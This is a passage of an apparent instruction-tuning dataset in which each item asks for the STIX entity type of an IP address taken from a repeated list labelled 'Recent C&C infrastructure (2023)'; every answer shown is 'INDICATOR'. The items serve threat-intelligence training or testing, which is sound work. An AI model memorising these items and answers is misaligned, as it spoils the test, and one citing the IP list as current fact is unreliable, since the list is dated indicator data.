178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n159.203.164.194\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n84.32.131.47\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n164.92.222.8\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n31.129.22.48\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.32.94.58\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 